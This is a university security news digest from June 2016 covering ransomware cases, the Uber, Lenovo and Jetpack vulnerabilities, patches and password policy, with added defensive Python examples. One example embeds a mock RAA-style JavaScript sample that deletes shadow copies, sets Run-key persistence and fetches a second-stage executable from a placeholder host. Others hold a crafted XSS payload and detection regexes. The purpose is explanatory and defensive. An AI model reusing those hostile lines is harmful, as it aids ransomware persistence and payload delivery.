Wilfrid Laurier University Information and Communication Technologies
June 25, 2016
 
 

Information Security News (June-22-2016)



--Pen testers discover mega vulnerabilities in Uber (June-23-2016)

Pen testing outfit Integrity has published a list of eight bugs uncovered during a three-week hunt for security vulnerabilities in the Uber car-hire system.

The team began hunting for vulnerabilities shortly after Uber opened its public bug bounty programme in March.

Other pen testers, who had taken part in an earlier invite-only programme, had already gone over the system, but the team persevered and found flaws as they dug deeper and deeper.

The flaws uncovered by the Portugal-based team allowed them to identify individual drivers and passengers and to download their travel history. They also discovered a $100 emergency-ride voucher that even Uber did not know existed.

They also confirmed six vulnerabilities which had previously been reported to Uber: an open redirect in trip.uber.com, an open redirect in riders.uber.com, user enumeration via getrush.uber.com followed by brute force through the iOS app to obtain a valid account, the ability to download the beta app as an admin, use of the partner/driver app without being activated, and enumeration of user IDs from phone numbers.

Eight new vulnerabilities were reported by the team, four of which are under embargo and will not be disclosed until later: a brute-force attack to obtain invite codes via riders.uber.com, viewing a driver's waybill from the driver's UUID, obtaining a driver's private email from the UUID, and obtaining trip information for arbitrary users.
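Two of the bug classes in these lists recur constantly in web applications: endpoints whose responses tell an attacker which accounts exist and which can then be brute-forced without throttling, and direct object references where knowing a driver's UUID is treated as permission to read the driver's record. The following is an added example written for this page, not code from Integrity's report or from Uber; the in-memory data, endpoint shapes, limits and the rate-limiter design are all assumptions. It shows each weak handler beside a hardened one.

```python
import hmac
from collections import defaultdict

# Constructed in-memory backend state (an assumption; nothing here is Uber's data model).
USERS = {"+15550001111": "u-1", "+15550002222": "u-2"}          # phone -> account id
INVITE_CODES = {"RIDE100": 100}                                 # invite code -> credit
DRIVERS = {"d-9f3a": {"email": "driver@example.invalid",
                      "waybill": "trip-42: 3.1 km, 11 min"}}
TRIPS = {"trip-42": {"driver": "d-9f3a", "rider": "u-2"}}
UNIFORM_MSG = "If that number is registered, a confirmation has been sent"


# --- vulnerable handlers ------------------------------------------------------
def lookup_vulnerable(phone):
    """Distinct answers reveal which numbers have accounts (enumeration)."""
    return "account exists" if phone in USERS else "no such account"


def redeem_vulnerable(code):
    """No throttling: invite codes can be guessed at full speed."""
    return INVITE_CODES.get(code, 0)


def waybill_vulnerable(driver_uuid):
    """Direct object reference: knowing the UUID is treated as authorization,
    and the record returned includes the driver's private email."""
    return DRIVERS.get(driver_uuid)


# --- hardened handlers --------------------------------------------------------
class RateLimiter:
    """Sliding-window limiter keyed by a client identifier (IP, device id, account)."""

    def __init__(self, limit, window):
        self.limit, self.window = limit, window
        self.hits = defaultdict(list)

    def allow(self, key, now):
        recent = [t for t in self.hits[key] if now - t < self.window]
        self.hits[key] = recent
        if len(recent) >= self.limit:
            return False
        recent.append(now)
        return True


limiter = RateLimiter(limit=5, window=60.0)


def lookup_hardened(phone, client, now):
    """Same status and body whether or not the number is registered, plus throttling."""
    if not limiter.allow(client, now):
        return 429, "slow down"
    return 200, UNIFORM_MSG


def redeem_hardened(code, client, now):
    """Throttled, and compared in constant time so response timing leaks nothing."""
    if not limiter.allow(client, now):
        return 429, 0
    for known, credit in INVITE_CODES.items():
        if hmac.compare_digest(known.encode(), code.encode()):
            return 200, credit
    return 200, 0


def waybill_hardened(requester, trip_id):
    """Authorize on the relationship (requester was a party to the trip), look the
    driver up through that trip rather than from a caller-supplied UUID, and return
    only the fields that party may see. 'Missing' and 'not yours' get the same answer."""
    trip = TRIPS.get(trip_id)
    if trip is None or requester not in (trip["rider"], trip["driver"]):
        return 404, None
    return 200, {"waybill": DRIVERS[trip["driver"]]["waybill"]}
```

The point of `waybill_hardened` is that an unguessable UUID is an identifier, not a credential: the check that matters is whether the caller is entitled to that driver's data, and the response must not differ between "no such trip" and "not your trip", or the endpoint becomes an enumeration oracle of its own.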

Fabio Pires, writing for the team, said that Uber has a very good bug bounty programme – “with great payouts” – and its development team seem genuinely eager to patch any vulnerabilities as soon as possible.

--Ransomware attack on Red Deer College thwarted (June-22-2016)

Red Deer College says it managed to ward off a ransomware attack last Friday after an employee downloaded an infected file but quickly noticed something was amiss and alerted the school's IT help desk.

"We were able to lock down the system within about five minutes," said Jim Brinkhurst, vice-president of college services.

"As a result of the quick response, we did not lose any data."

Post-secondary institutions, in particular, need to be prepared for these types of attacks, according to Chester Wisniewski, a Vancouver-based senior security adviser with the security firm Sophos.

"I would actually be surprised if any significantly sized organizations — especially something like a university, which is rather difficult to put controls on compared to a company — hasn't experienced some ransomware attacks, although obviously not usually as high of profile or as visibly as the ones at the University of Calgary," he said.

The U of C revealed earlier this month it had paid $20,000 to hackers who infected university computers with ransomware, which encrypts valuable data and renders it useless to the owners unless they pay a fee to the attackers to decrypt it.

Wisniewski said most attacks come in the form of a fake email that tricks recipients into downloading an infected attachment. Lately, he said attackers have targeted Canadians with official-looking emails purporting to come from the Canada Revenue Agency.

He said other attacks rely on exploiting vulnerabilities in software, particularly Adobe Flash, to infect computers that visit websites controlled by hackers.

In Red Deer College's case, Brinkhurst said the employee had downloaded an infected file, not through email, and called for support as soon as she noticed her error.

The college has been stepping up its defences against cyber attacks in the past six to eight months, he added, with extra training for faculty and staff on how to avoid becoming victims.

Make sure to back up your information

Wisniewski recommends regularly updating your computer's software, running a current anti-virus program, and being skeptical of unsolicited messages asking you to download files or visit unfamiliar websites.

Regularly backing up your data is "critically important," he added, and can save you a major headache — in addition to money — in the event that you do fall victim to a ransomware attack.

"At the University of Calgary, it could have saved them $20,000," he said.

"If you've got extra copies of all your sensitive information, you can tell the bad guys to take a hike and just go and get your backup hard drive."

--New RAA ransomware written in JavaScript discovered (June-17-2016)

A new variety of ransomware called RAA has been discovered. Somewhat unusually, it is written in JavaScript rather than one of the more standard programming languages, which makes it more effective in certain situations.

Bleeping Computer reported that security researchers @JAMES_MHT and @benkow_ found RAA and said it is being distributed by email through attachments that pretend to be a regular document file. Since JavaScript does not by itself feature any default cryptography functions, the ransomware's creators use the CryptoJS library, which provides the AES encryption used to lock up the victims' files.

Using JavaScript as a ransomware delivery vehicle is not exactly new, but it is not a method seen every day, said Malwarebytes Senior Researcher Jerome Segura.

Kevin Epstein, vice president of threat operations center at Proofpoint, told SCMagazine.com in an email, “As we've previously discussed in our blog, JavaScript can provide an advantage for attackers in various ways over compiled .exe files -- but we've seen ransomware written in everything from C++ to straight .bat files; detection needs to be based on dynamic as well as static file examination methods."

Opening the attachment kicks off a series of steps that not only locks up the victim's files but also downloads additional malware onto the target computer. The attachment does not visibly do anything and appears to the victim to be a corrupted file; in fact it is busy doing its dirty work in the background. This includes deleting the Windows Volume Shadow Copies so the encrypted files cannot be recovered, and registering the ransomware to run every time Windows starts so it can capture any new files.

“JavaScript is heavily used on the web and so it's a little bit unusual to see an actual piece of ransomware powered by a scripting language. Having said that, we witness many different infection vectors that were once considered old school (like macros) or unsophisticated making a comeback,” he told SCMagazine.com.

Bleeping Computer said at this time there is no way to decrypt the files, although there are steps to be taken that can thwart the attack.

“I guess it shows that there is a multitude of ways to load ransomware and defenders need to stay vigilant. In this particular case, disabling email attachments that contain a JavaScript file would be a good way of thwarting those attacks since there really is no legitimate purpose in sending those files by email in a normal context,” Segura said.

The additional malware installed is the password-stealing Pony trojan.
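The two defensive points above, Epstein's "static as well as dynamic examination" and Segura's advice to block JavaScript attachments outright, can be put together in a mail-gateway triage step. The following is an added example written for this page, not code from Bleeping Computer, Malwarebytes or Proofpoint, and the attachment it inspects is a constructed stand-in that merely mimics the behaviours reported for RAA (bundled CryptoJS AES, shadow-copy deletion, a Run-key entry, a decoy document written through ADODB.Stream, a second-stage download); the extension policy, indicator patterns, weights and verdict thresholds are all assumptions.

```python
import re

# Script types with no legitimate reason to arrive as a mail attachment (assumption: site policy).
BLOCKED_SCRIPT_EXTENSIONS = {".js", ".jse", ".wsf", ".wsh", ".vbs", ".vbe", ".hta"}

# Static indicators, each tied to a behaviour the article attributes to RAA.
# Patterns and weights are this example's own assumptions, not published signatures.
INDICATORS = [
    ("cryptojs_aes", r"CryptoJS\.AES\.encrypt|CryptoJS\s*=\s*CryptoJS\s*\|\|", 3),
    ("shadow_copy_delete", r"vssadmin(?:\.exe)?\s+delete\s+shadows|wmic\s+shadowcopy\s+delete", 4),
    ("run_key_persistence", r"CurrentVersion\\+Run\b", 3),
    ("file_drop", r"ADODB\.Stream", 2),
    ("downloader", r"MSXML2\.XMLHTTP|WinHttp\.WinHttpRequest", 2),
    ("shell_exec", r"WScript\.Shell", 1),
    ("decoy_document", r"\.(?:docx?|rtf|pdf)\b", 1),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE), weight) for name, pat, weight in INDICATORS]


def triage_attachment(filename, content):
    """Return a triage record for one attachment: policy decision first, then static indicators."""
    lower = filename.lower()
    ext = lower[lower.rfind("."):] if "." in lower else ""
    blocked = ext in BLOCKED_SCRIPT_EXTENSIONS
    double_ext = blocked and lower.count(".") >= 2        # e.g. invoice.doc.js, a classic decoy
    hits = [name for name, rx, _ in COMPILED if rx.search(content)]
    score = sum(w for name, _, w in COMPILED if name in hits)
    verdict = "malicious" if score >= 6 else "suspicious" if score >= 3 else "clean"
    return {"filename": filename, "blocked_by_policy": blocked, "double_extension": double_ext,
            "hits": hits, "score": score, "verdict": verdict}


def should_quarantine(filename, content):
    """Policy wins even when the content looks harmless: a .js attachment is dropped regardless."""
    r = triage_attachment(filename, content)
    return r["blocked_by_policy"] or r["verdict"] != "clean"


# Constructed sample attachment for this example. It is NOT RAA; it only mimics the
# behaviours reported for it so the indicators above have something to match.
SAMPLE_ATTACHMENT_NAME = "Invoice_2016-06.doc.js"
SAMPLE_ATTACHMENT = r'''
var CryptoJS = CryptoJS || (function () { /* bundled library would go here */ })();
var sh = new ActiveXObject("WScript.Shell");
function lock(text) { return CryptoJS.AES.encrypt(text, "k").toString(); }
sh.Run("cmd /c vssadmin delete shadows /all /quiet", 0, true);
sh.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\svc", WScript.ScriptFullName);
var st = new ActiveXObject("ADODB.Stream"); st.Type = 2; st.Open();
st.WriteText("decoy"); st.SaveToFile("Invoice_2016-06.doc", 2);
var x = new ActiveXObject("MSXML2.XMLHTTP");
x.open("GET", "http://second-stage.invalid/st.exe", false);
'''

if __name__ == "__main__":
    print(triage_attachment(SAMPLE_ATTACHMENT_NAME, SAMPLE_ATTACHMENT))
```

Static matching like this is cheap and catches the obvious cases, but a script that builds its strings at run time or decodes itself first will show none of these tokens, which is exactly why Epstein pairs it with dynamic analysis; the extension policy is the control that does not depend on the content at all.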

--Microsoft's June Patch Tuesday features 16 bulletins, five rated critical (June-14-2016)

Microsoft's June Patch Tuesday offering served up 16 update bulletins with five rated critical covering 44 CVEs, which equaled the number posted in May, but with three fewer critical issues.

Topping the list are the critical-rated MS16-063, MS16-068, MS16-069, MS16-070 and MS16-071, all of which, if left unpatched, would allow remote code execution. The affected products are Windows, Internet Explorer, Edge, Office, and Office services and web apps. The remaining 11 bulletins all carried an “important” rating.

MS16-071 caused alarm bells to go off for many industry experts.

Bobby Kuzma, systems engineer at Core Security, told SCMagazine.com in an email that he is most concerned about the DNS server bulletin, MS16-071, as having the greatest potential for exploitation in the wild.

“MS16-071 allows an unauthenticated attacker to send a specially crafted DNS request and would allow them to run the code as the local system account. [An] interesting corollary to the DNS client vulnerabilities that we saw a few months ago,” he said.

Michael Gray, VP of Technology at Thrive Networks, agreed, pointing out that this type of update is outside the norm.

“These types of patches are not typical, but given that most Windows DNS servers are not internet facing the exposure to the vulnerability is greatly decreased,” he told SCMagazine.com in an email.

Qualys CTO Wolfgang Kandek singled out MS16-070 as the one to watch, from the client side, in his monthly Patch Tuesday blog.

“The most important vulnerability is addressed in MS16-070, which fixes a number of problems in Microsoft Office. The most important vulnerability here is CVE-2016-0025 in Microsoft Word RTF format, which yields RCE for the attacker. Since RTF can be used to attack through Outlook's preview pane, the flaw can be triggered with a simple e-mail without user interaction,” Kandek noted.

Of the remaining updates the MS16-075 and MS16-076, which resolve vulnerabilities in Windows and Netlogon, stood out for Ty Reguly, manager at Tripwire VERT.

“One of the more interesting notes for administrators this month is that MS16-075 and MS16-076 share a security update for the server platforms. This means one less patch to install in those environments. It also addresses a couple of interesting vulnerabilities, particularly with MS16-075. The ability to forward authentication from one service to another is a particularly nasty flaw, however, Microsoft has indicated that the attacker must have authenticated access to the system, mitigating some of the risk,” Reguly told SCMagazine in an email.

Chris Goettl, product manager with Shavlik, told SCMagazine.com in an email that MS16-075 (CVE-2016-3225), MS16-077 (CVE-2016-3236) and MS16-082 (CVE-2016-3230), while only rated important, address publicly disclosed vulnerabilities and therefore warrant more immediate attention.

--Microsoft updates malware warnings with more specifics --(June-06-2016)

Microsoft has launched a new malware warning system with its Bing search engine now giving users specific warnings about possible threats on the sites being visited.

Chad Foster, Bing program manager, wrote in a blog post that Microsoft was doing away with its generic warnings, which only told users that a site might contain malware. He said the change was needed because the word malware is simply too generic.

“Bing now gives more details about the type of threat the user is facing. Furthermore, this improvement enables webmasters to clean their site quicker by having stronger insights into why their site was flagged,” he wrote.

Users will now see warnings such as “this might be a phishing site” or “this site might lead to malicious software”, while webmasters will receive a more detailed version so they can dig out any malware.

--'Trojan.Pornclicker' spotted in the Google Play store --(June-06-2016)

Malwarebytes researchers spotted what they dubbed a “Trojan.Pornclicker” in the Google Play store disguised as a Turkish application named “Mayis Guzel Aydir.”

The app's name roughly translates, depending on the source, either to “May Beautiful Overnights” or “May is a beautiful month”, and once installed and opened it displays a full-screen eyeball that doesn't appear to do anything. However, behind the scenes the application is silently visiting adult sites to earn pay-per-click revenue, according to a June 2 blog post.

Even if a user removes the app after seeing the app appears useless, researchers said the damage has already been done.

“Every time the app clicks any of these websites, the bad guys get paid and you are left with some embarrassing network traffic,” researchers said in the post.

Researchers said the app didn't have a description in the Google Play store and displayed a few screenshots of a calculator app which didn't appear to have anything to do with the app's name.

Despite lacking a clear description, the application had between 1,000 – 5,000 installs and 3.2 star rating with 383 ratings given on Google Play at the time the post was written, researchers said in the post. Several other versions of the app were also spotted with the same name but with a number at the end, such as “Mayis Guzel Aydir 2.”

The malicious app is also designed to monetize the bandwidth of its victim's traffic in a direct manner through ad clicks as opposed to stealing data, Tripwire Security Researcher Craig Young told SCMagazine.com via email comments. 

“Fortunately for consumers, in this case the damage is primarily caused to advertisers and advertising networks, but this type of attack can also end up costing users money by way of excessive data charges,” he said.

“Beyond the use of mobile anti-virus software, an average user would likely never know that their device is being abused in this way apart from battery drain and extra data consumption.”

The app has since been taken down, but researchers warned there may be others out there, and experts said this is a common attack in which someone creates an app that appears useful but carries out malicious deeds in the background.

“In the traditional desktop world, a Trojan threat such as this is more difficult to contain and fix,” Engin Kirda, co-founder and chief architect at Lastline, told SCMagazine.com via emailed comments.

“In the mobile world, however, we have the advantage that once a threat like this is detected, the app would be thrown out of the play store and more infections would be prevented,” Kirda said.

He said the easiest protection is not to install any apps that have very low popularity ratings or a low number of downloads, and that highly popular apps will usually not be malicious, although there are exceptions. He also said users should make sure they only grant an app the permissions they think it will need.

--Google updates Chrome with 15 patches --(June-06-2016)

Google reported it has updated Chrome to version 51.0.2704.79 for Windows, Mac, and Linux with a total of 15 security fixes, including two high and five medium threats, being patched.

The online giant paid out $26,000 in bug bounty fees to five individuals.

The two high-priority issues were CVE-2016-1696 and CVE-2016-1697, each of which earned its discoverer $7,500. The former was a cross-origin bypass in Extension bindings and the latter was also a cross-origin bypass, in Blink. Google credited Mariusz Mlynski for finding the second issue; the other bug hunter was anonymous.

Rob Wu found three issues for Google: CVE-2016-1698 ($4,000), an information leak in Extension bindings; CVE-2016-1700 ($1,500), a use-after-free in Extensions; and CVE-2016-1701 ($1,000), a use-after-free in Autofill.

--Report: 93 percent of phishing emails contained ransomware --(June-06-2016)

As cybercriminals pursue methods that yield the most effective near-term gains, phishing emails and ransomware are proving an irresistible cocktail, as a new report demonstrates. The report, by PhishMe, found that 93 percent of the phishing emails studied in March contained ransomware.

The study found 6.3 million phishing emails in Q1 2016, a volume of phishing emails that increased by 789 percent from the previous three month period.

Another study found that 46 percent of information technology decision makers said their company was “significantly” affected by malware, including phishing, ransomware, DDoS, APT, or other attacks. “The security problem is getting consistently worse, the consequences are getting consistently larger, and the frequency is growing,” PC Pitstop CEO Rob Cheng said in a statement.

ZapFraud CTO/founder Markus Jakobsson told SCMagazine.com that the number of phishing emails has certainly increased, but said the number of successful attacks is largely the result of sophisticated spearphishing attacks. He said targeted attacks “can net millions, instead of thousands,” and he noted that they “can be far more devastating.”

“One of the biggest concerns is the continued automation of targeted attacks,” Jakobsson said. Criminal groups are scraping the web to determine which companies do business with each other, and use that information to generate targeted phishing emails “all without an actual person doing the work.”

--CryptXXX ransomware again updated, can now encrypt network shared files (June-02-2016)

An updated version of the CryptXXX ransomware – that again renders decryption tools ineffective and has the ability for network share encryption – has been spotted in the wild.

Proofpoint researchers said in a blog post that CryptXXX v3.1000 was found in the wild last week. The nasty network share capability allows an infected machine to scan the /24 subnet on a local area network, find shared storage resources and then encrypt those files.

It was also noted that the CryptXXX decryptor tool developed by Kaspersky Lab had been rendered ineffective by CryptXXX v2.0 in May. It now remains basically unusable as “decrypting individual files is time-consuming and scales poorly, especially as CryptXXX begins encrypting many more files across network shares,” the Proofpoint researchers wrote.

The attackers also rolled out a new payment portal.

--Lenovo advises users to remove vulnerable preinstalled app (June-02-2016)

Lenovo advised users to remove the preloaded “Lenovo Accelerator Application” tool after researchers from the firm Duo Security discovered it could be exploited to perform man-in-the-middle (MitM) style attacks.

The vulnerable application has an insecure update mechanism that can be exploited remotely by an attacker with local network access. It was installed on some consumer notebook and desktop systems that shipped with Windows 10, according to Lenovo's security advisory.

Customers should uninstall Lenovo Accelerator Application by opening “Apps and Features” in Windows 10, selecting Lenovo Accelerator Application and clicking “Uninstall”, Lenovo said in the advisory.

If an attacker were to exploit the vulnerability the application would think that an update is available, download that update, and start installing it with system privileges, Flexera Software Director of Research and Security Kasper Lingaard told SCMagazine.com via emailed comments.

Once this is done the attacker can install whatever he or she wants, he said, adding that the vulnerability is due to the lack of encrypted traffic and the lack of security checks on the authenticity of the update.

"Traffic should be encrypted and updates should be signed," he said. “And you could always argue if updates really should be fetched and installed automatically when no proper security checks are implemented."
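What "encrypted and signed" buys an update client is easiest to see by running the two designs against the same attacker. The following is an added example written for this page, not Lenovo's code or protocol; the vendor host, manifest format, and version scheme are assumptions, and because the Python standard library has no asymmetric primitives, an HMAC with a fixed key stands in for the vendor's signature check (a shipped client would hold the vendor's public key and verify an Ed25519 or RSA-PSS signature, since any key present in the client binary can be read out of it). The network classes model what each client sees: a clean network, an on-path LAN attacker who can answer plaintext requests but cannot present a valid certificate for the vendor host, and a download mirror that serves a swapped binary.

```python
import hashlib
import hmac
import json
from urllib.parse import urlsplit

VENDOR = "https://updates.example.invalid"             # assumption: hypothetical vendor host
MANIFEST_URL, SIG_URL = VENDOR + "/manifest.json", VENDOR + "/manifest.sig"

# Stand-in for the vendor's signing key; see the note above about asymmetric signatures.
VENDOR_KEY = b"vendor-signing-key (stand-in)"
GENUINE_INSTALLER = b"genuine accelerator 1.2"
FORGED_INSTALLER = b"attacker payload running as SYSTEM"


def canonical(m):
    return json.dumps(m, sort_keys=True, separators=(",", ":")).encode()


def sign(manifest_bytes):
    return hmac.new(VENDOR_KEY, manifest_bytes, hashlib.sha256).digest()


def signature_ok(manifest_bytes, sig):
    return hmac.compare_digest(sign(manifest_bytes), sig)


def manifest(installer, url=VENDOR + "/acc-1.2.exe", version="1.2"):
    return canonical({"version": version, "url": url,
                      "sha256": hashlib.sha256(installer).hexdigest()})


GENUINE = manifest(GENUINE_INSTALLER)


class Honest:
    """Vendor servers as seen from a clean network (plaintext and TLS endpoints both answer)."""
    def get(self, url):
        return {MANIFEST_URL: GENUINE, SIG_URL: sign(GENUINE),
                "http://updates.example.invalid/manifest.json": GENUINE,
                VENDOR + "/acc-1.2.exe": GENUINE_INSTALLER}[url]


class OnPathAttacker:
    """LAN attacker (ARP/DNS spoofing): answers plaintext HTTP with forged data but holds
    no valid certificate for the vendor host, so a verified TLS connection fails closed."""
    def get(self, url):
        if url.startswith("https://"):
            raise ConnectionError("TLS certificate verification failed")
        forged = manifest(FORGED_INSTALLER, url="http://updates.example.invalid/acc-9.9.exe",
                          version="9.9")
        return forged if url.endswith("manifest.json") else FORGED_INSTALLER


class CompromisedMirror(Honest):
    """Valid TLS and a genuine signed manifest, but the download host serves a swapped binary."""
    def get(self, url):
        return FORGED_INSTALLER if url.endswith(".exe") else super().get(url)


def execute_as_system(blob):
    """Stand-in for launching the installer with SYSTEM privileges; returns what 'ran'."""
    return blob.decode()


def vulnerable_update(net, installed, run):
    """Plaintext fetch, no signature, no digest: whoever answers the request gets SYSTEM."""
    m = json.loads(net.get("http://updates.example.invalid/manifest.json"))
    if m["version"] > installed:                       # 'thinks an update is available'
        return run(net.get(m["url"]))
    return None


def hardened_update(net, installed, run):
    """Verified TLS, signed manifest, https-only download, no downgrade, pinned digest."""
    try:
        raw, sig = net.get(MANIFEST_URL), net.get(SIG_URL)
    except ConnectionError as e:
        return ("refused", str(e))
    if not signature_ok(raw, sig):
        return ("refused", "manifest signature invalid")
    m = json.loads(raw)
    if urlsplit(m["url"]).scheme != "https":
        return ("refused", "installer URL is not https")
    if tuple(map(int, m["version"].split("."))) <= tuple(map(int, installed.split("."))):
        return ("refused", "no newer version (blocks downgrade/replay)")
    blob = net.get(m["url"])
    if not hmac.compare_digest(hashlib.sha256(blob).hexdigest(), m["sha256"]):
        return ("refused", "installer digest mismatch")
    return ("installed", run(blob))
```

Each check closes a distinct hole: verified TLS stops the LAN attacker from answering at all, the manifest signature stops anyone who does get a TLS position from advertising their own binary, the digest pin stops a swapped download even from a mirror the manifest legitimately points at, and the version comparison stops replaying an old signed manifest for a build with a known bug.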

Lingaard said the vulnerability is easy to exploit and couldn't think of a reason why researchers had missed it in the preinstalled application.

“It would be very hard to argue it as being a simple oversight, so ignorance would likely be the best word to describe it,” he said referring to the vulnerability.

This isn't the first time Lenovo has been in hot water for its products containing preinstalled issues.

Last year, Lenovo was called out for shipping laptops infected with the “Superfish” adware preinstalled which led to Facebook probing the larger issue of SSL-sniffing adware.

--CryptoLocker partially shuts down Pinal County, Ariz. government network (June-02-2016)

The computer network of the Pinal County Attorney's Office in Arizona has been hit with CryptoLocker, effectively shutting down a segment of that agency's system, according to 12news.

County Attorney Lando Voyles said the ransomware has so far destroyed 64,000 files, isolated in his office's case management system – through which the public can request public records. He said it would likely be a week before the system is restored.

CryptoLocker is a trojan that depends on social engineering to dupe email recipients into opening attachments that appear to come from a legitimate sender. Once the victim opens the file, the malware is implanted on the computer or network, encrypts popular file types and demands a ransom, usually payable in bitcoin or via a pre-paid cash card.

Voyles said he had no intention of paying the ransom.

Contending that he had no evidence to press charges, Voyles said he has yet to get law enforcement involved. 

--Russia clamps down on financial hackers (June-01-2016)

Fifty members of a hacker gang alleged to have created malware used to steal millions from Russian banks have been arrested by Russian police.

Over the past year, malware used by the gang enrolled computers in a botnet that was then able to target 18 unidentified banks and government agencies. The amount stolen ranges from $25.5 million to $45 million (USD) in differing accounts.

The Federal Security Service (FSB) – in cooperation with the Interior Ministry and National Guard troops – made the arrests in 15 regions across the Russian Federation, according to a Bloomberg News report.

Of those arrested, 18 suspects were denied bail and three were placed under house arrest. All were charged with the creation, distribution and use of malicious computer programs.

During the raids, police took possession of computer and communications equipment, bank cards in false names, financial documents and "significant amounts of cash," the FSB said.

--Jetpack plug-in for WordPress vulnerable to XSS (June-01-2016)

Bloggers using the WordPress platform are being advised to update the Jetpack plug-in to avoid a cross-site scripting vulnerability.

One million users of the plug-in, which is developed by Automattic, the company behind WordPress.com, could be at risk. The tool provides website enhancements, management and security features.

The flaw – which impacts Jetpack releases since 2012, beginning with v2.0 – was detected by web security firm Sucuri. The bug is located in the Shortcode Embeds Jetpack module, a shortcut function enabled by default that allows users to embed videos, images, documents, tweets and other materials.

The Sucuri researchers said this flaw can be exploited to inject malicious JavaScript code into comments. Subsequently, it "could allow an attacker to hijack administrator accounts, inject SEO spam to the affected page, and redirect visitors to malicious websites," Sucuri noted in a blog post.
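The mechanics of a stored XSS through an embed shortcode are worth seeing in code: a commenter supplies a URL, the plug-in turns the shortcode into an iframe, and if the URL is interpolated into markup without validation and escaping, the "URL" can carry an event handler or a javascript: scheme. The following is an added example written for this page; it is not Jetpack's parser and makes no claim about the specific flaw Sucuri found. The shortcode grammar, the provider allowlist and the sample comments are assumptions.

```python
import html
import re
from urllib.parse import urlsplit

# Assumed shortcode grammar: [provider src=...] inside a comment. Not Jetpack's parser.
SHORTCODE = re.compile(r"\[(?P<name>[a-z]+)\s+src=(?P<src>[^\]]+)\]")
# Assumption: embed providers this site permits, matched on exact host over https only.
ALLOWED_EMBED_HOSTS = {"player.vimeo.com", "www.youtube.com"}


def render_vulnerable(comment):
    """Interpolates an attacker-controlled attribute straight into markup."""
    return SHORTCODE.sub(lambda m: '<iframe src="%s"></iframe>' % m.group("src"), comment)


def safe_embed_url(raw):
    """Return a canonical https URL on an allowed host, or None.
    Rejects other schemes (javascript:, data:, http:) and userinfo tricks such as
    https://player.vimeo.com@evil.invalid/ where the real host is evil.invalid."""
    parts = urlsplit(raw.strip().strip('"'))
    if parts.scheme != "https" or parts.username or parts.password:
        return None
    if parts.hostname not in ALLOWED_EMBED_HOSTS:
        return None
    return parts.geturl()


def render_hardened(comment):
    """Escape all comment text; expand a shortcode only when its URL passes validation,
    and escape the URL again when placing it into the attribute."""
    out, pos = [], 0
    for m in SHORTCODE.finditer(comment):
        out.append(html.escape(comment[pos:m.start()]))
        url = safe_embed_url(m.group("src"))
        if url is None:
            out.append(html.escape(m.group(0)))      # rejected: shown as literal text, not markup
        else:
            out.append('<iframe src="%s"></iframe>' % html.escape(url, quote=True))
        pos = m.end()
    out.append(html.escape(comment[pos:]))
    return "".join(out)


if __name__ == "__main__":
    crafted = '[vimeo src=x" onload="alert(1)]'            # constructed hostile comment
    print(render_vulnerable(crafted))
    print(render_hardened(crafted))
```

Two separate defences are at work: the allowlist decides whether the URL may become markup at all, and `html.escape(..., quote=True)` guarantees that whatever survives validation cannot terminate the attribute. Dropping either one reopens the hole, which is why an embed feature that is "enabled by default" deserves both.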

Update as soon as possible, said the researchers.

--Microsoft ends common password use and password lockout (May-31-2016)

Microsoft is dynamically banning common passwords and using smart password lockout to protect users and passwords in the Microsoft Account system and the Azure AD private preview.

Dynamically banning common passwords helps users choose a unique and hard-to-guess password. The Azure AD Identity Protection team continuously updates the list of common passwords to prevent users from choosing known easy passwords, such as “Password”.

Smart password lockout is another method Microsoft is using to make sure legitimate users are not locked out when bad guys are trying to guess passwords online. This approach considers the risk associated with a specific login session to decide how lockout is applied. Microsoft says it can determine that risk using data on where the person is logging in from and what network they are using, and so can lock out suspected intruders while still allowing legitimate users to log in if they are on their own device and a network they have used before.
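The two mechanisms can be sketched in a few dozen lines. The following is an added example written for this page, not Microsoft's implementation: the banned list is a tiny stand-in for Microsoft's continuously updated one, the normalisation (case folding plus common letter substitutions, so "P@ssw0rd" is judged as "password") and the point scheme are modelled on the scoring Microsoft later documented for Azure AD password protection but are assumptions here, and the lockout keeps a separate failure counter per (account, source) with a higher allowance for sources that have previously signed in successfully, standing in for the richer risk signals (location, network, device) the passage describes.

```python
import re
import unicodedata
from collections import defaultdict

# Assumption: a tiny banned list. The real list is large, global and updated continuously.
BANNED = {"password", "qwerty", "letmein", "welcome", "iloveyou", "football", "admin"}
# Common substitutions folded back to letters so "P@ssw0rd" is judged as "password".
LEET = str.maketrans({"@": "a", "$": "s", "!": "i", "0": "o", "1": "i", "3": "e",
                      "4": "a", "5": "s", "7": "t", "8": "b"})


def normalize(password):
    return unicodedata.normalize("NFKC", password).lower().translate(LEET)


def score(password, extra_banned=()):
    """Each banned term found scores 1 point; each remaining character scores 1 point.
    extra_banned carries tenant-specific terms (company name, product names)."""
    remaining = normalize(password)
    points = 0
    terms = {normalize(t) for t in extra_banned} | BANNED
    for term in sorted(terms, key=len, reverse=True):      # longest term first
        while term in remaining:
            points += 1
            remaining = remaining.replace(term, "", 1)
    return points + len(remaining)


def is_acceptable(password, extra_banned=()):
    """Assumed threshold: five points, so a banned word plus a digit and a symbol is not enough."""
    return score(password, extra_banned) >= 5


class SmartLockout:
    """Lock out guessing from unfamiliar sources without locking out the real user.
    A 'source' is whatever identifies where the attempt comes from (device id, network)."""

    def __init__(self, threshold=10, familiar_threshold=100, window=600.0):
        self.threshold = threshold                  # failures allowed from an unknown source
        self.familiar_threshold = familiar_threshold  # failures allowed from a known-good source
        self.window = window                        # seconds a failure stays counted
        self.failures = defaultdict(list)           # (user, source) -> failure timestamps
        self.familiar = defaultdict(set)            # user -> sources that have signed in before

    def _recent(self, key, now):
        self.failures[key] = [t for t in self.failures[key] if now - t < self.window]
        return self.failures[key]

    def is_locked(self, user, source, now):
        limit = self.familiar_threshold if source in self.familiar[user] else self.threshold
        return len(self._recent((user, source), now)) >= limit

    def record(self, user, source, success, now):
        if success:
            self.familiar[user].add(source)
            self.failures[(user, source)].clear()
        else:
            self._recent((user, source), now).append(now)
```

Keying the counter on (account, source) is what lets the attacker's source be locked while the user's own laptop on the home network keeps working; the obvious weakness, an attacker who rotates sources, is why a real system also keeps an aggregate per-account count and feeds in the location and network signals the passage mentions.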

This move by Microsoft has been seen by some as a response to recent credential dumps, such as the 2012 LinkedIn breach data that resurfaced for sale this year and a separate cache of 272.3 million stolen account credentials traded on a Russian darknet forum. Troy Hunt, creator of the breach-notification service Have I Been Pwned?, commented in a Threatpost blog post: “The danger for LinkedIn users is that while most of the four-year-old LinkedIn data is garbage, there are tens of millions of email addresses out of the 117 million tied to passwords that will still unlock accounts elsewhere on the web today.”

